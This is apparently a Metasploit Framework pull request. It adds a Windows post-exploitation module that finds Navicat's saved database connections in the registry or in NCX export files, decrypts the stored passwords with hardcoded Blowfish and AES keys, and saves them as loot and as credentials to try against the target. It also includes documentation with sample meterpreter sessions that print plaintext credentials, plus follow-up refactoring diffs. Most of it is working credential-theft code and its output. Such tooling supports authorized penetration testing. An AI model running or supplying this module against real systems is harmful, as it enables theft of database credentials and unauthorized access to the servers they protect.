### PR TITLE
Gather_Navicat

### DIFF
--- a/documentation/modules/post/windows/gather/credentials/navicat.md
+++ b/documentation/modules/post/windows/gather/credentials/navicat.md
@@ -1,0 +1,71 @@
+## Vulnerable Application
+
+This module can decrypt the password of navicat, If the user chooses to remember the password.
+
+  Analysis of encryption algorithm [here](https://github.com/HyperSine/how-does-navicat-encrypt-password).
+
+  You can find its official website [here](https://navicat.com/).
+
+## Verification Steps
+
+  1. Download the latest installer of Navicat.
+  2. Use navicat to log in to DB server.
+  3. Remember to save the account password.
+  4. Get a `meterpreter` session on a Windows host.
+  5. Do: ```run post/windows/gather/credentials/navicat```
+  6. If the session file is saved in the system, the host, port, user name and plaintext password will be printed.
+
+## Options
+
+ **NCX_PATH**
+
+  - Specify the path of the NCX export file. e.g.:connections.ncx
+
+## Scenarios
+
+```
+meterpreter > run post/windows/gather/credentials/navicat 
+
+*] Gathering Navicat password information from WIN-79MR8QJM50N 
+Navicat Sessions 
+================                                                                                                                                        
+Name            Protocol  Hostname   Port   Username  Password                                                                                                 
+----            --------  --------   ----   --------  --------                                                                                                 
+mongodb         mongodb   localhost  27017  user      password  
+test_mysql      mysql     localhost  3306   root      test_mysql_password 
+test_oracle     oracle    127.0.0.1  1521   user      password
+test_pg         postgres  localhost  5432   postgres  test_pg_password
+test_sqlserver  mssql     127.0.0.1  1433   user      password
+
+[+] Session info stored in: /home/kali-team/.msf4/loot/20221002233644_default_192.168.80.128_host.navicat_ses_919319.txt
+[*] Post module execution completed
+meterpreter > 
+```
+
+* Specify **NCX_PATH**
+
+```
+msf6 post(windows/gather/credentials/navicat) > set ncx_path C:\\Users\\FireEye\\Desktop\\connections.ncx
+ncx_path => C:\Users\FireEye\Desktop\connections.ncx
+msf6 post(windows/gather/credentials/navicat) > run
+
+[*] Gathering Navicat password information from WIN-79MR8QJM50N
+[*] Looking for C:\Users\FireEye\Desktop\connections.ncx
+[+] navicat.ncx saved to /home/kali-team/.msf4/loot/20221002234356_default_192.168.80.128_navicat.creds_838577.txt
+Navicat Sessions
+================
+
+Name            Protocol    Hostname   Port   Username  Password
+----            --------    --------   ----   --------  --------
+mongodb         mongodb     localhost  27017            password
+test_mysql      mysql       localhost  3306             test_mysql_password
+test_oracle     oracle      127.0.0.1  1521             password
+test_pg         postgresql  localhost  5432             test_pg_password
+test_sqlserver  sqlserver   127.0.0.1  1433             password
+
+[+] Session info stored in: /home/kali-team/.msf4/loot/20221002234356_default_192.168.80.128_host.navicat_ses_522370.txt
+[*] Finished processing C:\Users\FireEye\Desktop\connections.ncx
+[*] Post module execution completed
+
+
+```

--- a/documentation/modules/post/windows/gather/credentials/navicat.md
+++ b/documentation/modules/post/windows/gather/credentials/navicat.md
@@ -17,9 +17,9 @@ This module can decrypt the password of navicat, If the user chooses to remember
 
 ## Options
 
- **NCX_PATH**
+### NCX_PATH
 
-  - Specify the path of the NCX export file. e.g.:connections.ncx
+Specify the path of the NCX export file. e.g.: connections.ncx
 
 ## Scenarios
 

--- a/documentation/modules/post/windows/gather/credentials/navicat.md
+++ b/documentation/modules/post/windows/gather/credentials/navicat.md
@@ -28,9 +28,10 @@ meterpreter > run post/windows/gather/credentials/navicat
 
 *] Gathering Navicat password information from WIN-79MR8QJM50N 
 Navicat Sessions 
-================                                                                                                                                        
-Name            Protocol  Hostname   Port   Username  Password                                                                                                 
-----            --------  --------   ----   --------  --------                                                                                                 
+================
+
+Name            Protocol  Hostname   Port   Username  Password
+----            --------  --------   ----   --------  --------
 mongodb         mongodb   localhost  27017  user      password  
 test_mysql      mysql     localhost  3306   root      test_mysql_password 
 test_oracle     oracle    127.0.0.1  1521   user      password
@@ -55,13 +56,13 @@ msf6 post(windows/gather/credentials/navicat) > run
 Navicat Sessions
 ================
 
-Name            Protocol    Hostname   Port   Username  Password
-----            --------    --------   ----   --------  --------
-mongodb         mongodb     localhost  27017            password
-test_mysql      mysql       localhost  3306             test_mysql_password
-test_oracle     oracle      127.0.0.1  1521             password
-test_pg         postgresql  localhost  5432             test_pg_password
-test_sqlserver  sqlserver   127.0.0.1  1433             password
+Name            Protocol  Hostname   Port   Username  Password
+----            --------  --------   ----   --------  --------
+mongodb         mongodb   localhost  27017  user      password  
+test_mysql      mysql     localhost  3306   root      test_mysql_password 
+test_oracle     oracle    127.0.0.1  1521   user      password
+test_pg         postgres  localhost  5432   postgres  test_pg_password
+test_sqlserver  mssql     127.0.0.1  1433   user      password
 
 [+] Session info stored in: /home/kali-team/.msf4/loot/20221002234356_default_192.168.80.128_host.navicat_ses_522370.txt
 [*] Finished processing C:\Users\FireEye\Desktop\connections.ncx

--- a/documentation/modules/post/windows/gather/credentials/navicat.md
+++ b/documentation/modules/post/windows/gather/credentials/navicat.md
@@ -12,7 +12,7 @@ This module can decrypt the password of navicat, If the user chooses to remember
   2. Use navicat to log in to DB server.
   3. Remember to save the account password.
   4. Get a `meterpreter` session on a Windows host.
-  5. Do: ```run post/windows/gather/credentials/navicat```
+  5. Do: `run post/windows/gather/credentials/navicat`
   6. If the session file is saved in the system, the host, port, user name and plaintext password will be printed.
 
 ## Options

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -221,7 +221,7 @@ class MetasploitModule < Msf::Post
       navicat_store_config(config)
     end
     print_line(tbl.to_s)
-    if tbl.rows.count
+    if tbl.rows.count > 0
       path = store_loot('host.navicat_session', 'text/plain', session, tbl, 'navicat_sessions.txt', 'Navicat Sessions')
       print_good("Session info stored in: #{path}")
     end

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -102,6 +102,7 @@ class MetasploitModule < Msf::Post
 
   def navicat_store_config(config)
     if %i[hostname service_name port username].any? { |e| config[e].blank? } || config[:password].nil?
+      vprint_warning('Key data is empty, skip saving service credential')
       return # If any of these fields are nil or are empty (with the exception of the password field which can be empty),
       # then we shouldn't proceed, as we don't have enough info to store a credential which someone could actually
       # use against a target.
@@ -228,7 +229,9 @@ class MetasploitModule < Msf::Post
       print_status("Looking for #{ncx_path}")
       begin
         if file_exist?(ncx_path)
-          condata = read_file(ncx_path)
+          condata = read_file(ncx_path) || ''
+          return if condata.empty?
+
           loot_path = store_loot('navicat.creds', 'text/xml', session, condata, ncx_path)
           print_good("navicat.ncx saved to #{loot_path}")
           parse_xml(condata)

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -242,7 +242,6 @@ class MetasploitModule < Msf::Post
         end
       rescue Rex::Post::Meterpreter::RequestError
         fail_with(Msf::Module::Failure::BadConfig, "The file #{ncx_path} either could not be read or does not exist")
-        return
       end
       return
     else

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Post
     )
     register_options(
       [
-        OptString.new('NCX_PATH', [ false, 'Specify the path of the NCX export file. e.g.:connections.ncx']),
+        OptString.new('NCX_PATH', [ false, 'Specify the path of the NCX export file (e.g. connections.ncx).']),
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -246,7 +246,6 @@ class MetasploitModule < Msf::Post
       rescue Rex::Post::Meterpreter::RequestError
         fail_with(Msf::Module::Failure::BadConfig, "The file #{ncx_path} either could not be read or does not exist")
       end
-      return
     else
       get_reg
       print_status('Finished processing from the registry')

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -223,7 +223,7 @@ class MetasploitModule < Msf::Post
 
   def run
     print_status('Gathering Navicat password information.')
-    if datastore['NCX_PATH']
+    if datastore['NCX_PATH'].present?
       ncx_path = datastore['NCX_PATH']
       print_status("Looking for #{ncx_path}")
       begin

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -21,7 +21,10 @@ class MetasploitModule < Msf::Post
           [ 'URL', 'https://github.com/HyperSine/how-does-navicat-encrypt-password'],
           [ 'URL', 'https://blog.kali-team.cn/Metasploit-Navicat-fbc1390cf57c40b5b576584c48b8e125']
         ],
-        'Author' => [ 'HyperSine', 'Kali-Team <kali-team[at]qq.com>'],
+        'Author' => [
+          'HyperSine', # Research and PoC
+          'Kali-Team <kali-team[at]qq.com>' # MSF module
+        ],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
         'Compat' => {

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Post
       host = node.attributes['Host']
       port = node.attributes['Port']
       proto = node.attributes['ConnType']
-      username = node.attributes['Username']
+      username = node.attributes['UserName']
       name = node.attributes['ConnectionName']
       epassword = node.attributes['Password']
       password = decrypt_navicat_ncx(epassword)

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -241,7 +241,7 @@ class MetasploitModule < Msf::Post
           print_status("Finished processing #{ncx_path}")
         end
       rescue Rex::Post::Meterpreter::RequestError
-        print_status("The file #{ncx_path} either could not be read or does not exist")
+        fail_with(Msf::Module::Failure::BadConfig, "The file #{ncx_path} either could not be read or does not exist")
         return
       end
       return

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Post
   end
 
   def navicat_store_config(config)
-    if [:hostname, :service_name, :port, :username].any? { |e| config[e].blank? } || config[:password].nil?
+    if %i[hostname service_name port username].any? { |e| config[e].blank? } || config[:password].nil?
       return # If any of these fields are nil or are empty (with the exception of the password field which can be empty),
       # then we shouldn't proceed, as we don't have enough info to store a credential which someone could actually
       # use against a target.

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -1,0 +1,257 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# @blurbdust based this code off of https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
+# and https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/enum_ms_product_keys.rb
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather Navicat Passwords',
+        'Description' => %q{ This module will find and decrypt stored Navicat passwords },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://github.com/HyperSine/how-does-navicat-encrypt-password']
+        ],
+        'Author' => [ 'HyperSine', 'Kali-Team <kali-team[at]qq.com>'],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_railgun_api
+              stdapi_railgun_api_multi
+              stdapi_railgun_memread
+              stdapi_railgun_memwrite
+              stdapi_sys_process_get_processes
+            ]
+          }
+
+        },
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('NCX_PATH', [ false, 'Specify the path of the NCX export file. e.g.:connections.ncx']),
+      ]
+    )
+  end
+
+  def blowfish_encrypt(data = "\xFF" * 8)
+    secret_key = Digest::SHA1.digest('3DC5CA39')
+    cipher = OpenSSL::Cipher.new('bf-ecb').encrypt
+    cipher.padding = 0
+    cipher.key_len = secret_key.length
+    cipher.key = secret_key
+    cipher.update(data) << cipher.final
+  end
+
+  def blowfish_decrypt(text)
+    secret_key = Digest::SHA1.digest('3DC5CA39')
+    cipher = OpenSSL::Cipher.new('bf-cbc').decrypt
+    cipher.padding = 0
+    cipher.key_len = secret_key.length
+    cipher.key = secret_key
+    cipher.iv = "\x00" * 8
+    cipher.update(text) + cipher.final
+  end
+
+  def strxor(str, second)
+    str.bytes.zip(second.bytes).map { |a, b| (a ^ b).chr }.join
+  end
+
+  def decrypt_navicat11(encrypted_data)
+    password = ''
+    return password unless encrypted_data
+
+    iv = blowfish_encrypt
+    ciphertext = [encrypted_data].pack('H*')
+    cv = iv
+    full_round, left_length = ciphertext.length.divmod(8)
+
+    password = ''
+    if full_round > 0
+      for i in 0..full_round - 1 do
+        t = blowfish_decrypt(ciphertext[i * 8, 8])
+        t = strxor(t, cv)
+        password += t
+        cv = strxor(cv, ciphertext[i * 8, 8])
+      end
+    end
+
+    if left_length > 0
+      cv = blowfish_encrypt(cv)
+      test_value = strxor(ciphertext[8 * full_round, left_length], cv[0, left_length])
+      password += test_value
+    end
+
+    password
+  end
+
+  def decrypt_navicat_ncx(ciphertext)
+    ciphertext = [ciphertext].pack('H*')
+    aes = OpenSSL::Cipher.new('aes-128-cbc')
+    aes.decrypt
+    aes.key = 'libcckeylibcckey'
+    aes.padding = 0
+    aes.iv = 'libcciv libcciv '
+    aes.update(ciphertext)
+  end
+
+  def navicat_store_config(config)
+    if config[:hostname].to_s.empty? || config[:service_name].to_s.empty? || config[:port].to_s.empty? || config[:username].to_s.empty? || config[:password].nil?
+      return # If any of these fields are nil or are empty (with the exception of the password field which can be empty),
+      # then we shouldn't proceed, as we don't have enough info to store a credential which someone could actually
+      # use against a target.
+    end
+
+    service_data = {
+      address: config[:hostname],
+      port: config[:port],
+      service_name: config[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: refname,
+      private_type: :password,
+      private_data: config[:password],
+      username: config[:username],
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+    create_credential_and_login(credential_data)
+  end
+
+  def parse_xml(data)
+    mxml = REXML::Document.new(data).root
+    result = []
+    mxml.elements.to_a('//Connection').each do |node|
+      host = node.attributes['Host']
+      port = node.attributes['Port']
+      proto = node.attributes['ConnType']
+      username = node.attributes['Username']
+      name = node.attributes['ConnectionName']
+      epassword = node.attributes['Password']
+      password = decrypt_navicat_ncx(epassword)
+      result << {
+        name: name,
+        protocol: proto.downcase,
+        hostname: host,
+        port: port,
+        username: username,
+        password: password || epassword
+      }
+    end
+    print_and_save(result)
+    return result
+  end
+
+  def get_reg
+    reg_keys = Hash.new
+
+    reg_keys['mysql'] = 'HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers'
+    reg_keys['mariadb'] = 'HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers'
+    reg_keys['mongodb'] = 'HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB\Servers'
+    reg_keys['mssql'] = 'HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers'
+    reg_keys['oracle'] = 'HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers'
+    reg_keys['postgres'] = 'HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers'
+    reg_keys['sqlite'] = 'HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers'
+    result = []
+    reg_keys.each_pair do |db_name, reg_key|
+      subkeys = registry_enumkeys(reg_key)
+      next if subkeys.nil?
+
+      subkeys.each do |subkey|
+        enc_pwd_value = registry_getvaldata("#{reg_key}\\#{subkey}", 'Pwd')
+        username_value = registry_getvaldata("#{reg_key}\\#{subkey}", 'UserName')
+        port_value = registry_getvaldata("#{reg_key}\\#{subkey}", 'Port')
+        host_value = registry_getvaldata("#{reg_key}\\#{subkey}", 'Host')
+        next if enc_pwd_value.nil?
+
+        pwd_value = decrypt_navicat11(enc_pwd_value)
+        result << {
+          name: subkey,
+          protocol: db_name,
+          hostname: host_value,
+          port: port_value,
+          username: username_value,
+          password: pwd_value || enc_pwd_value
+        }
+      end
+    end
+    print_and_save(result)
+    return result
+  end
+
+  def print_and_save(results)
+    columns = [
+      'Name',
+      'Protocol',
+      'Hostname',
+      'Port',
+      'Username',
+      'Password',
+    ]
+    tbl = Rex::Text::Table.new(
+      'Header' => 'Navicat Sessions',
+      'Columns' => columns
+    )
+    results.each do |item|
+      tbl << item.values
+      config = {
+        name: item[:name],
+        hostname: item[:hostname],
+        service_name: item[:protocol],
+        port: item[:port].nil? ? '' : item[:port].to_i,
+        username: item[:username],
+        password: item[:password]
+      }
+      navicat_store_config(config)
+    end
+    print_line(tbl.to_s)
+    if tbl.rows.count
+      path = store_loot('host.navicat_session', 'text/plain', session, tbl, 'navicat_sessions.txt', 'Navicat Sessions')
+      print_good("Session info stored in: #{path}")
+    end
+  end
+
+  def run
+    print_status("Gathering Navicat password information from #{sysinfo['Computer']}")
+    if datastore['NCX_PATH']
+      ncx_path = datastore['NCX_PATH']
+      print_status("Looking for #{ncx_path}")
+      begin
+        if file_exist?(ncx_path)
+          condata = read_file(ncx_path)
+          loot_path = store_loot('navicat.creds', 'text/xml', session, condata, ncx_path)
+          print_good("navicat.ncx saved to #{loot_path}")
+          parse_xml(condata)
+          print_status("Finished processing #{ncx_path}")
+        end
+      rescue Rex::Post::Meterpreter::RequestError
+        print_status("The file #{ncx_path} either could not be read or does not exist")
+        return
+      end
+      return
+    else
+      get_reg
+      print_status('Finished processing from the registry')
+    end
+  end
+
+end

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -27,14 +27,6 @@ class MetasploitModule < Msf::Post
         ],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
-        'Compat' => {
-          'Meterpreter' => {
-            'Commands' => %w[
-
-            ]
-          }
-
-        },
         'Notes' => {
           'Stability' => [],
           'Reliability' => [],

--- a/modules/post/windows/gather/credentials/navicat.rb
+++ b/modules/post/windows/gather/credentials/navicat.rb
@@ -18,7 +18,8 @@ class MetasploitModule < Msf::Post
         'Description' => %q{ This module will find and decrypt stored Navicat passwords },
         'License' => MSF_LICENSE,
         'References' => [
-          [ 'URL', 'https://github.com/HyperSine/how-does-navicat-encrypt-password']
+          [ 'URL', 'https://github.com/HyperSine/how-does-navicat-encrypt-password'],
+          [ 'URL', 'https://blog.kali-team.cn/Metasploit-Navicat-fbc1390cf57c40b5b576584c48b8e125']
         ],
         'Author' => [ 'HyperSine', 'Kali-Team <kali-team[at]qq.com>'],
         'Platform' => [ 'win' ],
@@ -26,11 +27,7 @@ class MetasploitModule < Msf::Post
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
-              stdapi_railgun_api
-              stdapi_railgun_api_multi
-              stdapi_railgun_memread
-              stdapi_railgun_memwrite
-              stdapi_sys_process_get_processes
+
             ]
           }
 


### PR DESCRIPTION
## Vulnerable Application

This module can decrypt the password of navicat, If the user chooses to remember the password.

  Analysis of encryption algorithm [here](https://github.com/HyperSine/how-does-navicat-encrypt-password).

  You can find its official website [here](https://navicat.com/).

## Verification Steps

  1. Download the latest installer of Navicat.
  2. Use navicat to log in to DB server.
  3. Remember to save the account password.
  4. Get a `meterpreter` session on a Windows host.
  5. Do: ```run post/windows/gather/credentials/navicat```
  6. If the session file is saved in the system, the host, port, user name and plaintext password will be printed.

## Options

 **NCX_PATH**

  - Specify the path of the NCX export file. e.g.:connections.ncx

## Scenarios

```
meterpreter > run post/windows/gather/credentials/navicat 

*] Gathering Navicat password information from WIN-79MR8QJM50N 
Navicat Sessions 
================                                                                                                                                        
Name            Protocol  Hostname   Port   Username  Password                                                                                                 
----            --------  --------   ----   --------  --------                                                                                                 
mongodb         mongodb   localhost  27017  user      password  
test_mysql      mysql     localhost  3306   root      test_mysql_password 
test_oracle     oracle    127.0.0.1  1521   user      password
test_pg         postgres  localhost  5432   postgres  test_pg_password
test_sqlserver  mssql     127.0.0.1  1433   user      password

[+] Session info stored in: /home/kali-team/.msf4/loot/20221002233644_default_192.168.80.128_host.navicat_ses_919319.txt
[*] Post module execution completed
meterpreter > 
```

* Specify **NCX_PATH**

```
msf6 post(windows/gather/credentials/navicat) > set ncx_path C:\\Users\\FireEye\\Desktop\\connections.ncx
ncx_path => C:\Users\FireEye\Desktop\connections.ncx
msf6 post(windows/gather/credentials/navicat) > run

[*] Gathering Navicat password information from WIN-79MR8QJM50N
[*] Looking for C:\Users\FireEye\Desktop\connections.ncx
[+] navicat.ncx saved to /home/kali-team/.msf4/loot/20221002234356_default_192.168.80.128_navicat.creds_838577.txt
Navicat Sessions
================

Name            Protocol    Hostname   Port   Username  Password
----            --------    --------   ----   --------  --------
mongodb         mongodb     localhost  27017            password
test_mysql      mysql       localhost  3306             test_mysql_password
test_oracle     oracle      127.0.0.1  1521             password
test_pg         postgresql  localhost  5432             test_pg_password
test_sqlserver  sqlserver   127.0.0.1  1433             password

[+] Session info stored in: /home/kali-team/.msf4/loot/20221002234356_default_192.168.80.128_host.navicat_ses_522370.txt
[*] Finished processing C:\Users\FireEye\Desktop\connections.ncx
[*] Post module execution completed


```